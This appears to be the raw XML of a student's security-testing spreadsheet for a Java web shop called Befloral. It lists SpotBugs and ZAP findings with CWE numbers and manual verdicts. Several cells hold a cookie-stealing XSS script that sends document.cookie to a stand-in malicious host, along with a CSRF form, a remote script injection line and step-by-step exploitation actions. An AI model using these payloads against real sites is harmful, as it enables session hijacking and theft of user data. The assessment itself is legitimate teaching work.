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 sheetId="1" r:id="rId4"/>
    <sheet state="visible" name="preQuest" sheetId="2" r:id="rId5"/>
    <sheet state="visible" name="Results (Befloral)" sheetId="3" r:id="rId6"/>
    <sheet state="visible" name="postQuest" sheetId="4" r:id="rId7"/>
    <sheet state="hidden" name="Fields" sheetId="5" r:id="rId8"/>
  </sheets>
  <definedNames/>
  <calcPr/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="286" uniqueCount="161">
  <si>
    <t>Name</t>
  </si>
  <si>
    <t>Christian</t>
  </si>
  <si>
    <t>Surname</t>
  </si>
  <si>
    <t>Sassi</t>
  </si>
  <si>
    <t>Student ID/Matricola</t>
  </si>
  <si>
    <t>APPLICATION TESTED</t>
  </si>
  <si>
    <t>Befloral</t>
  </si>
  <si>
    <t>Question</t>
  </si>
  <si>
    <t>Answer</t>
  </si>
  <si>
    <t>I have a strong experience as developer</t>
  </si>
  <si>
    <t>Neutral</t>
  </si>
  <si>
    <t>I have a strong background and experience in programming with Java</t>
  </si>
  <si>
    <t>I have a strong background and experience in programming Web apps with Java</t>
  </si>
  <si>
    <t>Disagree</t>
  </si>
  <si>
    <t>I have a strong experience as tester (e.g., bug discovery and/or fixing)</t>
  </si>
  <si>
    <t xml:space="preserve">I have a strong experience in security </t>
  </si>
  <si>
    <t>The task that I have to do is clear enough</t>
  </si>
  <si>
    <t>Agree</t>
  </si>
  <si>
    <t>I agree that the anonymized report data can be used for research and teaching purposes</t>
  </si>
  <si>
    <t>YES</t>
  </si>
  <si>
    <t>Tested App</t>
  </si>
  <si>
    <t xml:space="preserve">Id
(incremental number)
</t>
  </si>
  <si>
    <t>Type of analysis
(Static, Dynamic, Static+Dynamic,Manual)</t>
  </si>
  <si>
    <t>Tool used 
(if any)</t>
  </si>
  <si>
    <t xml:space="preserve">Reported vulnerability
(from the tool)
</t>
  </si>
  <si>
    <t xml:space="preserve">Details about the vulnerability
(from the tool)
</t>
  </si>
  <si>
    <t xml:space="preserve">Entry points identified by the Passive Scanner
(URL, HTML element, etc)
</t>
  </si>
  <si>
    <t xml:space="preserve">Entry points identified by the Active Scanner / Fuzzer /etc
(URL, HTML element, etc)
</t>
  </si>
  <si>
    <t xml:space="preserve">Details about the vulnerability
</t>
  </si>
  <si>
    <t xml:space="preserve">OWASP Top-10 
(if possible)
</t>
  </si>
  <si>
    <t xml:space="preserve">
CWE
(if possible)
</t>
  </si>
  <si>
    <t>Overall Exploitation Time
(minutes)
(manual inspection of tool results)</t>
  </si>
  <si>
    <t>Is the vulnerability alert correct?
(yes / no)
(manual inspection of tool results)</t>
  </si>
  <si>
    <t xml:space="preserve">Test case for vulnerability exploitation / Attack Vector
</t>
  </si>
  <si>
    <t>Bug location
(file name, class, and line number of the vulnerability sink)
(manual inspection of tool results)</t>
  </si>
  <si>
    <t xml:space="preserve">Brief Vulnerability description
</t>
  </si>
  <si>
    <t>(URL, if any)</t>
  </si>
  <si>
    <t>input data</t>
  </si>
  <si>
    <t>exploitation actions</t>
  </si>
  <si>
    <t>Static + Manual</t>
  </si>
  <si>
    <t>SpotBugs</t>
  </si>
  <si>
    <t>Path Traversal</t>
  </si>
  <si>
    <t>This API (java/io/File.&lt;init&gt;(Ljava/lang/String;)V) reads a file whose location might be specified by user input [Scary(7), Normal confidence]
Bug: This API (java/io/File.&lt;init&gt;(Ljava/lang/String;)V) reads a file whose location might be specified by user input
A file is opened to read its content. The filename comes from an input parameter. If an unfiltered parameter is passed to this file API, files from an arbitrary filesystem location could be read.
This rule identifies potential path traversal vulnerabilities. In many cases, the constructed file path cannot be controlled by the user. If that is the case, the reported instance is a false positive.</t>
  </si>
  <si>
    <t>No</t>
  </si>
  <si>
    <t>CWE-22</t>
  </si>
  <si>
    <t>ProductServlet.java, ProductServlet, 74</t>
  </si>
  <si>
    <t>SpotBugs reports a Path Traversal vulnerability. Specifically, it highlights an instruction where the server constructs the path of a file through string and variable concatenation. While some variables (such as realPath and imageRoot) are not influenced by user input, the .getId() method of a product object (within the Product class of the Product.java file) is user-defined during attempts to add a new product. However, even if a malicious user attempted to manipulate it, the outcome would merely involve the visualization of other product images (if available) or a default error image.</t>
  </si>
  <si>
    <t>ProductServlet.java, ProductServlet, 95</t>
  </si>
  <si>
    <t>This API (java/nio/file/Paths.get(Ljava/lang/String;[Ljava/lang/String;)Ljava/nio/file/Path;) reads a file whose location might be specified by user input [Scary(7), Normal confidence]
Bug: This API (java/nio/file/Paths.get(Ljava/lang/String;[Ljava/lang/String;)Ljava/nio/file/Path;) reads a file whose location might be specified by user input
A file is opened to read its content. The filename comes from an input parameter. If an unfiltered parameter is passed to this file API, files from an arbitrary filesystem location could be read.
This rule identifies potential path traversal vulnerabilities. In many cases, the constructed file path cannot be controlled by the user. If that is the case, the reported instance is a false positive.</t>
  </si>
  <si>
    <t>AdminServlet.java, AdminServlet, 46</t>
  </si>
  <si>
    <t>SpotBugs reports a Path Traversal vulnerability. Specifically, it highlights an instruction where the server accesses to a log file and shows its content (by specyfing action=viewLog in the request) in the webpage. However, this can be done only by an admin so a direct file access performed by a unauthorzed user would not work. In addition, even if the user is an admin, direct access file is not possible, even trying to put the full path of the log. This is because the file is not accessible via URL, as all operations on it are executed locally by the server.</t>
  </si>
  <si>
    <t>AdminServlet.java, AdminServlet, 51</t>
  </si>
  <si>
    <t>SpotBugs reports a Path Traversal vulnerability. Specifically, it highlights an instruction where the server accesses to a log file and clears its content (by specyfing action=clearLog in the request). However, this can be done only by an admin so a direct file access performed by a unauthorzed user would not work. In addition, even if the user is an admin, direct access file is not possible, even trying to put the full path of the log. This is because the file is not accessible via URL, as all operations on it are executed locally by the server.</t>
  </si>
  <si>
    <t>SQL Injection</t>
  </si>
  <si>
    <t>This use of java/sql/Connection.prepareStatement(Ljava/lang/String;)Ljava/sql/PreparedStatement; can be vulnerable to SQL injection (with JDBC) [Scary(7), Normal confidence]
Bug: This use of java/sql/Connection.prepareStatement(Ljava/lang/String;)Ljava/sql/PreparedStatement; can be vulnerable to SQL injection (with JDBC)
The input values included in SQL queries need to be passed in safely. Bind variables in prepared statements can be used to easily mitigate the risk of SQL injection.</t>
  </si>
  <si>
    <t>Yes</t>
  </si>
  <si>
    <t>CWE-89</t>
  </si>
  <si>
    <t>ReviewDAO.java, ReviewDAO, 39</t>
  </si>
  <si>
    <t>SpotBugs reports a SQL Injection vulnerability. Specifically, it highlights an instruction where a sql query is executed using a non constant prepared statement, meaning that some variables are used to create it. In this case, only the variable "order" is used and since it comes from an user input, it can be considered as tainted, making a SQL Injection possible. However, this method is not used in the project so yes, the vulnerability exists but it does not represent a real exploitable vulnerability.</t>
  </si>
  <si>
    <t>This use of java/sql/Connection.prepareStatement(Ljava/lang/String;)Ljava/sql/PreparedStatement; can be vulnerable to SQL injection (with JDBC) [Scary(7), Normal confidence]
Bug: A prepared statement is generated from a nonconstant String in it.befloral.model.ReviewDAO.doRetrieveByUser(String, User)
The code creates an SQL prepared statement from a nonconstant String. If unchecked, tainted data from a user is used in building this String, SQL injection could be used to make the prepared statement do something unexpected and undesirable.</t>
  </si>
  <si>
    <t>ReviewDAO.java, ReviewDAO, 62</t>
  </si>
  <si>
    <t>ReviewDAO.java, ReviewDAO, 86</t>
  </si>
  <si>
    <t xml:space="preserve">SpotBugs reports a SQL Injection vulnerability. Specifically, it highlights an instruction where a sql query is executed using a non constant prepared statement, meaning that some variables are used to create it. In this case, only the variable "order" is used, but by looking at the call hierarchy of the method, it comes up that there is only one method that calls doRetrieveByProduct() and it is doRetriveByKey(). However in this case the value of the parameter "order" put by doRetrieveByKey() is always the same, meaning that at the end of the day, the prepared statement is constant. </t>
  </si>
  <si>
    <t>/befloral/Products</t>
  </si>
  <si>
    <t>?sort=name;&lt;QUERY&gt;</t>
  </si>
  <si>
    <t>1) Go to Products section: befloral/Products
2) Add ?sort=name;&lt;QUERY&gt; after the url where &lt;QUERY&gt; is the malicious query</t>
  </si>
  <si>
    <t>ProductDAO.java, ProductDAO, 46</t>
  </si>
  <si>
    <t>SpotBugs reports a SQL Injection vulnerability. Specifically, it highlights an instruction where a sql query is executed using a non constant prepared statement, meaning that some variables are used to create it. In this scenario, only the variable "order" is used. Upon examining the call hierarchy of the method, a specific call is observed in ProductServlet.java, where the value of the variable "order" is assigned by retrieving the parameter specified in the request. Consequently, this vulnerability can indeed be exploited by a malicious user to execute a SQL Injection attack.
During the tests, it was observed that exploiting this vulnerability was not feasible. Although the crafted query worked correctly when tested in the MySQL console, it failed to execute via the URL. This discrepancy is likely attributed to a database permission setting. Nevertheless, despite the inability to exploit the vulnerability directly through the URL, it still remains a true vulnerability.</t>
  </si>
  <si>
    <t>Dynamic + Manual</t>
  </si>
  <si>
    <t>ZAP - Fuzzing</t>
  </si>
  <si>
    <t>befloral/Products</t>
  </si>
  <si>
    <t>The earlier vulnerability was reevaluated employing a dynamic approach: Fuzzy. This time, the tool attempted to assign the parameter "sort" to various tainted queries. However, as previously explained, it was observed that exploiting this vulnerability was not feasible. Although the crafted query worked correctly when tested in the MySQL console, it failed to execute via the URL. This discrepancy is likely attributed to a database permission setting. Nevertheless, despite the inability to exploit the vulnerability directly through the URL, it still remains a true vulnerability.</t>
  </si>
  <si>
    <t>Unvalidated Redirects</t>
  </si>
  <si>
    <t>The following redirection could be used by an attacker to redirect users to a phishing website. [Scary(7), Normal confidence]
Bug: The following redirection could be used by an attacker to redirect users to a phishing website.
Unvalidated redirects occur when an application redirects a user to a destination URL specified by a user supplied parameter that is not validated. Such vulnerabilities can be used to facilitate phishing attacks.</t>
  </si>
  <si>
    <t>CWE-601</t>
  </si>
  <si>
    <t>UserServlet.java, UserServlet, 179
UserServlet.java, UserServlet, 202
AdminServlet.java, AdminServlet, 59
AdminOrderServlet.java, AdminOrderServlet, 207
AdminProductServlet.java, AdminProductServlet, 189
AdminProductServlet.java, AdminProductServlet, 213
AdminProductServlet.java, AdminProductServlet, 124
ProductServlet.java, ProductServlet, 133</t>
  </si>
  <si>
    <t>SpotBugs reports Unvalidated Redirects for all these instructions. By manually analyzing them, it is possible to see that they all represent false positives. In fact, SpotBugs reports this code as vulnerable (example):
protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
    [...]
    resp.sendRedirect(req.getParameter("redirectUrl"));
    [...]
}
but in this case there is always something like:
response.sendRedirect(request.getServletContext().getContextPath()+"...");
where request.getServletContext().getContextPath() always returns a fixed value not modifiable by the user and the same happens for "..." that is always a fixed string not modifiable by the user.
So, in all these cases, the user cannot perform an Unvalidated Redirect.</t>
  </si>
  <si>
    <t>Cross-Site Scripting XSS</t>
  </si>
  <si>
    <t>This use of java/io/PrintWriter.print(Ljava/lang/String;)V could be vulnerable to XSS in the Servlet [Scary(7), Normal confidence]
Bug: This use of java/io/PrintWriter.print(Ljava/lang/String;)V could be vulnerable to XSS in the Servlet
A potential XSS was found. It could be used to execute unwanted JavaScript in a client's browser.</t>
  </si>
  <si>
    <t>CWE-79</t>
  </si>
  <si>
    <t>/Api/Cart</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Calibri"/>
        <color theme="1"/>
        <sz val="11.0"/>
      </rPr>
      <t>This is an example of a script capable of exploiting the vulnerable endpoint:
&lt;script&gt;
  var xhttp = new XMLHttpRequest();
  var method = "GET";
  var url = "</t>
    </r>
    <r>
      <rPr>
        <rFont val="Calibri"/>
        <color rgb="FF1155CC"/>
        <sz val="11.0"/>
        <u/>
      </rPr>
      <t>http://malicious.website</t>
    </r>
    <r>
      <rPr>
        <rFont val="Calibri"/>
        <color theme="1"/>
        <sz val="11.0"/>
      </rPr>
      <t>";
  var cookies = document.cookie;
  url += "?cookies=" + encodeURIComponent(cookies);
  xhttp.open(method, url, true);
  xhttp.setRequestHeader("x-requested-with", "xss attack");
  xhttp.send();
&lt;/script&gt;</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Since the endpoint is not used in the project, it is not possible to report the list of actions capable of executing the attack. </t>
  </si>
  <si>
    <t>CartApiServlet.java, CartApiServlet, 56</t>
  </si>
  <si>
    <t>SpotBugs reports an XSS vulnerability. Specifically, it highlights an instruction where the cart content is returned to the client's webpage. The cart object can contain several product objects, and since each attribute of each product can be defined by a user(adminstrator only), it could potentially be exploited to perform an XSS attack. It's important to note that creating a new product with tainted attributes can only be done by the administrator, so not all users can perform this attack. Finally, this is a persistent/type-1 XSS attack because the potentially malicious code is stored on the server/database.
During testing, it was observed that the vulnerable servlet is used but not the vulnerable method (GET). While SpotBugs would detect a true XSS vulnerability if the servlet were in use within the project, its non-use suggests that the likelihood of it leading to an XSS attack is low. 
Additionally, attempting direct access to the endpoint (/befloral/Api/Cart) will result in a server response of 500, as it first verifies whether the header contains a specific field called ""x-requested-with"" (it checks if the request is made using AJAX). Since there is no feasible way to craft a custom, malicious link that also sets a custom header, it is not possible to directly exploit this vulnerability without using a script.
Nevertheless, this vulnerability remains valid as it could be exploited by creating a custom script that redirects to the endpoint with a custom header. Of course this script would work if there were tainted products saved inside the database, ready to be displayed.</t>
  </si>
  <si>
    <t>befloral/Api/User
/befloral/User?action=viewAddresses *
/befloral/Orders?action=checkout *
/befloral/Admin/Orders *</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Calibri"/>
        <color theme="1"/>
        <sz val="11.0"/>
      </rPr>
      <t>&lt;script&gt;
  var xhttp = new XMLHttpRequest();
  var method = "GET";
  var url = "</t>
    </r>
    <r>
      <rPr>
        <rFont val="Calibri"/>
        <color rgb="FF1155CC"/>
        <sz val="11.0"/>
        <u/>
      </rPr>
      <t>http://malicious.website</t>
    </r>
    <r>
      <rPr>
        <rFont val="Calibri"/>
        <color theme="1"/>
        <sz val="11.0"/>
      </rPr>
      <t>";
  var cookies = document.cookie;
  url += "?cookies=" + encodeURIComponent(cookies);
  xhttp.open(method, url, true);
  xhttp.setRequestHeader("x-requested-with", "xss attack");
  xhttp.send();
&lt;/script&gt;</t>
    </r>
  </si>
  <si>
    <t>1) Login
2) Add a product to the cart
3) Navigate to /befloral/Cart
4) Click on "Buy Now"
5) In the "Delivery Address" section click "Select" and "Create New Address"
6) Put the script into one of the address field (the target field must accept a string parameter), for example the alias of the address 
7) Once saved, in the buy now section select the address
Or
1) Login
2) Navigate to /befloral/User
3) Click on the "+" icon in order to create a new address
4) Put the script into one of the address fields (the field must accept a string parameter), for example the alias of the address 
3) Once saved, click on "My Addresses"</t>
  </si>
  <si>
    <t>UserApiServlet.java, UserApiServlet, 74</t>
  </si>
  <si>
    <t>SpotBugs reports an XSS vulnerability. Specifically, it highlights an instruction where the addresses created by a user are returned to the client's webpage. Since each attribute of the address object can be displayed (rendered in the client's webpage), this could potentially be exploited to perform an XSS attack. This is a persistent/type-1 XSS attack because the potentially malicious code is stored on the server/database.
In addition, it is important to notice that attempting direct access to the endpoint (/befloral/Api/User) will result in a server response of 500, as it first verifies whether the header contains a specific field called "x-requested-with" (it checks if the request is made using AJAX). Since there is no feasible way to craft a custom, malicious link that also sets a custom header, it is not possible to exploit this vulnerability by crafting a custom direct link. Of course, this can be done by using a script.
* Furthermore, upon conducting more extensive manual testing, it was noted that there are additional endpoints attributable to the same vulnerability.
N.B. endpoints containing the word "Admin" can only be accessed by administrators.</t>
  </si>
  <si>
    <t>This use of java/io/PrintWriter.print(Ljava/lang/String;)V could be vulnerable to XSS in the Servlet [Scary(7), Normal confidence]
Bug: This use of java/io/PrintWriter.print(Ljava/lang/String;)V could be vulnerable to XSS in the Servlet
A potential XSS was found. It could be used to execute unwanted JavaScript in a client's browser.</t>
  </si>
  <si>
    <t>befloral/Api/Products
befloral/Products *
befloral/Admin/Products *</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Calibri"/>
        <color theme="1"/>
        <sz val="11.0"/>
      </rPr>
      <t>&lt;script&gt;
  var xhttp = new XMLHttpRequest();
  var method = "GET";
  var url = "</t>
    </r>
    <r>
      <rPr>
        <rFont val="Calibri"/>
        <color rgb="FF1155CC"/>
        <sz val="11.0"/>
        <u/>
      </rPr>
      <t>http://malicious.website</t>
    </r>
    <r>
      <rPr>
        <rFont val="Calibri"/>
        <color theme="1"/>
        <sz val="11.0"/>
      </rPr>
      <t>";
  var cookies = document.cookie;
  url += "?cookies=" + encodeURIComponent(cookies);
  xhttp.open(method, url, true);
  xhttp.setRequestHeader("x-requested-with", "xss attack");
  xhttp.send();
&lt;/script&gt;</t>
    </r>
  </si>
  <si>
    <t>1) Login as an administrator (e.g. username: admin@befloral.com password: admin)
2) Navigate to /befloral/Admin/Products
3) Click on "Add New Product"
4) Put the script into one of the product fields (the target field must accept a string parameter), for example the name of the product
5.a) Navigate to befloral/Products (all users) and view the product
5.b) Navigate to befloral/Admin/Paroducts (admin only) and view the product</t>
  </si>
  <si>
    <t>ProductApiServlet.java, ProductApiServlet, 49</t>
  </si>
  <si>
    <t>SpotBugs reports an XSS vulnerability. Specifically, it highlights an instruction where the products searched by a user are returned to the client's webpage. Since each attribute of the product object can be displayed (rendered in the client's webpage), this could potentially be exploited to perform an XSS attack. However, it's important to note that creating a new product with tainted attributes can only be done by the administrator, so not all users can perform this attack. Finally, this is a persistent/type-1 XSS attack because the potentially malicious code is stored on the server/database.
During testing, it was observed that the vulnerable servlet is not used within the project or, alternatively, the vulnerable method is not used. While SpotBugs would detect a true XSS vulnerability if the servlet were in use within the project, its non-use suggests that the likelihood of it leading to an XSS attack is low. 
Additionally, attempting direct access to the endpoint (/befloral/Api/Products) will result in a server response of 500, as it first verifies whether the header contains a specific field called "x-requested-with" (it checks if the request is made using AJAX). Since there is no feasible way to craft a custom, malicious link that also sets a custom header, it is not possible to directly exploit this vulnerability without using a script.
Nevertheless, this vulnerability remains valid as it could be exploited by creating a custom script that redirects to the endpoint with a custom header. Of course this script would work if there were tainted products saved inside the database, ready to be displayed.
* Furthermore, upon conducting more extensive manual testing, it was noted that there are additional endpoints attributable to the same vulnerability.
N.B. endpoints containing the word "Admin" can only be accessed by administrators.</t>
  </si>
  <si>
    <t>ProductServlet.java, ProductServlet, 161
ProductServlet.java, ProductServlet, 137
ProductServlet.java, ProductServlet, 158
UserApiServlet.java, UserApiServlet, 67
UserApiServlet.java, UserApiServlet, 62
UserApiServlet.java, UserApiServlet, 54
UserApiServlet.java, UserApiServlet, 49
OrderApiServlet.java, OrderApiServlet, 56
OrderApiServlet.java, OrderApiServlet, 51
OrderApiServlet.java, OrderApiServlet, 64
CartApiServlet.java, CartApiServlet, 73
CartApiServlet.java, CartApiServlet, 80
CartApiServlet.java, CartApiServlet, 86
CartApiServlet.java, CartApiServlet, 95
CartApiServlet.java, CartApiServlet, 99
CartApiServlet.java, CartApiServlet, 105
CartApiServlet.java, CartApiServlet, 112
ProductApiServlet.java, ProductApiServlet, 55</t>
  </si>
  <si>
    <t>SpotBugs reports a XSS vulnerability for all these lines of code. Specifically, it highlights the instructions where the server returns text to the client. However, in this case, the returned text is always constant, meaning that it cannot change due to user input. Therefore, there is no risk of an XSS attack.</t>
  </si>
  <si>
    <t>Manual</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Calibri"/>
        <color theme="1"/>
        <sz val="11.0"/>
      </rPr>
      <t>&lt;script&gt;
  var xhttp = new XMLHttpRequest();
  var method = "GET";
  var url = "</t>
    </r>
    <r>
      <rPr>
        <rFont val="Calibri"/>
        <color rgb="FF1155CC"/>
        <sz val="11.0"/>
        <u/>
      </rPr>
      <t>http://malicious.website</t>
    </r>
    <r>
      <rPr>
        <rFont val="Calibri"/>
        <color theme="1"/>
        <sz val="11.0"/>
      </rPr>
      <t>";
  var cookies = document.cookie;
  url += "?cookies=" + encodeURIComponent(cookies);
  xhttp.open(method, url, true);
  xhttp.setRequestHeader("x-requested-with", "xss attack");
  xhttp.send();
&lt;/script&gt;</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">1) Login
2) Navigate to a specific product page
3) Click on "Review" button
4) Put the script into one of the review fields
 </t>
  </si>
  <si>
    <t>ProductServlet.java, ProductServlet, 150, 151</t>
  </si>
  <si>
    <t>During manual testing, the identified lines of code were found to be vulnerable to an XSS attack. Specifically, it is possible to inject malicious code when submitting a review. Consequently, all users who view the review will be exposed to the malicious code, as it will execute upon viewing. Therefore, this vulnerability can lead to a persistent/type-1 XSS attack.</t>
  </si>
  <si>
    <t>Client-Side Validation</t>
  </si>
  <si>
    <t>CWE-602</t>
  </si>
  <si>
    <t>befloral/Login</t>
  </si>
  <si>
    <t>var xhttp = new XMLHttpRequest();
var url = "/befloral/Login";
var action = "register";
var firstName = "firstname";
var lastName = "&lt;script&gt;alert('Attack')&lt;/script&gt;";
var email = "example@gmail.com";
var gender = "Undefined";
var birthdayview = "01/01/2001";
var birthday = "2001-01-01";
var password = "12345678Aa";
var confirmpassword = "12345678Aa";
var params = "action=" + action +
             "&amp;firstName=" + firstName +
             "&amp;lastName=" + lastName +
             "&amp;email=" + encodeURIComponent(email) +
             "&amp;gender=" + gender +
             "&amp;birthdayview=" + encodeURIComponent(birthdayview) +
             "&amp;birthday=" + birthday +
             "&amp;password=" + encodeURIComponent(password) +
             "&amp;confirmpassword=" + encodeURIComponent(confirmpassword);
xhttp.open("POST", url, true);
xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhttp.send(params);</t>
  </si>
  <si>
    <t>1) Navigate to befloral/Home
2) Open the console and paste the script. A new user will be created with email: example@gmail.com and password: 12345678Aa
3) Navigate to befloral/User?action=viewData</t>
  </si>
  <si>
    <t>LoginServlet.java, LoginServlet, 150, 151, 153, 154, 155</t>
  </si>
  <si>
    <t>During manual testing, the identified lines of code were found to be vulnerable to an Client-Side Validation attack. Specifically, when a new user attempts to register, the client employs some validation mechanisms to check the integrity of the provided inputs. However, due to the absence of additional checks by the server, it becomes feasible to bypass these controls by executing a script that initiates the POST request for account creation. Consequently, malicious code can be injected into the account fields and thi can, for example, allows a malicious user to perform an XSS attack.</t>
  </si>
  <si>
    <t>ZAP</t>
  </si>
  <si>
    <t>Cross-Site Request Forgery CSRF</t>
  </si>
  <si>
    <t>No Anti-CSRF tokens were found in a HTML submission form.
A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.
CSRF attacks are effective in a number of situations, including:
    * The victim has an active session on the target site.
    * The victim is authenticated via HTTP auth on the target site.
    * The victim is on the same local network as the target site.
CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.
No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "" ].</t>
  </si>
  <si>
    <t>URL: befloral/resources/css/home.css
HTML: &lt;form method="get" action="Home"&gt;</t>
  </si>
  <si>
    <t>CWE-352</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Calibri"/>
        <color theme="1"/>
        <sz val="11.0"/>
      </rPr>
      <t>&lt;form id="maliciousForm" action="</t>
    </r>
    <r>
      <rPr>
        <rFont val="Calibri"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>http://localhost:8080/befloral/Api/Cart</t>
    </r>
    <r>
      <rPr>
        <rFont val="Calibri"/>
        <color theme="1"/>
        <sz val="11.0"/>
      </rPr>
      <t>" method="POST"&gt;
        &lt;input type="hidden" name="action" value="add"&gt;
        &lt;input type="hidden" name="id" value="18"&gt;
        &lt;input type="submit" value="Submit"&gt;
    &lt;/form&gt;</t>
    </r>
  </si>
  <si>
    <t>In this example, the attack vector involves the exploitation of the victim's JSESSIONID token to generate a request on a malicious website. This request is designed to automatically add a product to the victim's cart (as a basic example) when they click on the button within the form.
1) Login
2) Navigate to http://malicious.website (supposing it has implemented the given script)
3) Click on Submit</t>
  </si>
  <si>
    <t>ZAP reports the absence of Anti-CSRF Tokens for the given URL, which could potentially expose it to Cross-Site Request Forgery attacks. While it is accurate that the Anti-CSRF Token is absent from the HTML form, attempting to craft a malicious request for a victim would not pose any risks, as the affected form is solely used for redirecting to the website's homepage.
Upon conducting further manual testing, it was observed that the absence of Anti-CSRF Tokens poses a significant exploitable vulnerability for more critical endpoints, such as those used for adding a product to the cart, finalizing an order, or writing a review. 
Therefore, this warning can be considered a true positive, regardless of the tool's low confidence level.
Vulnerable endpoints:
befloral/Api/Cart
befloral/Orders
befloral/Products</t>
  </si>
  <si>
    <t>Cookie Without SameSite Attribute</t>
  </si>
  <si>
    <t>A cookie has been set without the SameSite attribute, which means that the cookie can be sent as a result of a 'cross-site' request. The SameSite attribute is an effective counter measure to cross-site request forgery, cross-site script inclusion, and timing attacks.</t>
  </si>
  <si>
    <t>befloral</t>
  </si>
  <si>
    <t>CWE-1275</t>
  </si>
  <si>
    <t>document.cookie</t>
  </si>
  <si>
    <t>In this example, the attack vector involves the theft of a cookie not protected by the SameSite attribute. This vulnerability allows an attacker to retrieve the JSESSIONID of an authenticated user and impersonate him when accessing the web application where the victim is authenticated.</t>
  </si>
  <si>
    <t xml:space="preserve">ZAP reports a vulnerability related to the SameSite attribute missing when the JSESSIONID cookie is set. This could potentially allow a malicious website to steal the cookie after a user (victim) logs into the web application. Consequently, the malicious website could use the JSESSIONID cookie to perform unauthorized actions within the web application, effectively impersonating the victim due to access to the session cookie (CSRF attack). Therefore, this warning can be considered a true positive, regardless of the tool's low confidence level.
</t>
  </si>
  <si>
    <t>Content Security Policy (CSP) Header Not Set</t>
  </si>
  <si>
    <t>Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware. CSP provides a set of standard HTTP headers that allow website owners to declare approved sources of content that browsers should be allowed to load on that page — covered types are JavaScript, CSS, HTML frames, fonts, images and embeddable objects such as Java applets, ActiveX, audio and video files.</t>
  </si>
  <si>
    <t>befloral
befloral/Home
befloral/resources/css/home.css
befloral/Team
favicon.ico</t>
  </si>
  <si>
    <t>CWE-693</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Calibri"/>
        <color theme="1"/>
        <sz val="11.0"/>
      </rPr>
      <t>&lt;script src="</t>
    </r>
    <r>
      <rPr>
        <rFont val="Calibri"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>http://malicious.website/malicious-script.js</t>
    </r>
    <r>
      <rPr>
        <rFont val="Calibri"/>
        <color theme="1"/>
        <sz val="11.0"/>
      </rPr>
      <t>"&gt;&lt;/script&gt;</t>
    </r>
  </si>
  <si>
    <t>Based on findings from other analysis sessions, it has been observed that this web application may be vulnerable to data injection attacks. These attacks have the potential to exploit one of the injection methods outlined previously by injecting the provided code.</t>
  </si>
  <si>
    <t>ZAP reports a potential vulnerability regarding the absence of the Content Security Policy (CSP) header, correctly noting that it is missing from all reported endpoints (and more). This finding is deemed accurate because the lack of this header could facilitate exploitation, particularly when combined with other types of injection attacks, enabling the loading and injection of malicious scripts from untrusted sources into a victim's client. To mitigate this vulnerability, it is recommended to specify, via the appropriate header, a whitelist of domains from which JavaScript scripts can be safely loaded.</t>
  </si>
  <si>
    <t>Vulnerable JS Library</t>
  </si>
  <si>
    <t>Vulnerable JS Libraries:
The identified library jquery, version 1.11.1 is vulnerable.
The identified library jquery, version 1.12.4 is vulnerable.
The identified library jquery, version 1.12.4 is vulnerable.</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Calibri"/>
        <color theme="1"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">http://code.jquery.com/jquery-1.11.1.min.js
https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Calibri"/>
        <color rgb="FF1155CC"/>
        <sz val="11.0"/>
        <u/>
      </rPr>
      <t xml:space="preserve">https://code.jquery.com/jquery-1.12.4.js
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Calibri"/>
        <color theme="1"/>
        <sz val="11.0"/>
      </rPr>
      <t>https://code.jquery.com/ui/1.12.1/jquery-ui.js</t>
    </r>
  </si>
  <si>
    <t>CWE-829</t>
  </si>
  <si>
    <t>ZAP reports several vulnerabilities coming from outdated components. For this reason, they can be considered as true positives.</t>
  </si>
  <si>
    <t xml:space="preserve">                        In my opinion, …</t>
  </si>
  <si>
    <t xml:space="preserve">the task of the project was easy </t>
  </si>
  <si>
    <t>the task was too expensive, i.e., it required too much time</t>
  </si>
  <si>
    <t xml:space="preserve">the tool used for the static analysis has been effective in discovering vulnerabilities </t>
  </si>
  <si>
    <t>the tool used for the static analysis has been helpful for vulnerability exploitation</t>
  </si>
  <si>
    <t xml:space="preserve">the tool used for the dynamic analysis has been effective in discovering vulnerabilities </t>
  </si>
  <si>
    <t xml:space="preserve">the tool used for the dynamic analysis has been helpful for vulnerability exploitation </t>
  </si>
  <si>
    <t xml:space="preserve">overall the tools have been helpful in vulnerability identification and exploitation </t>
  </si>
  <si>
    <t>the tested application is enough secure</t>
  </si>
  <si>
    <t>Strongly disagree</t>
  </si>
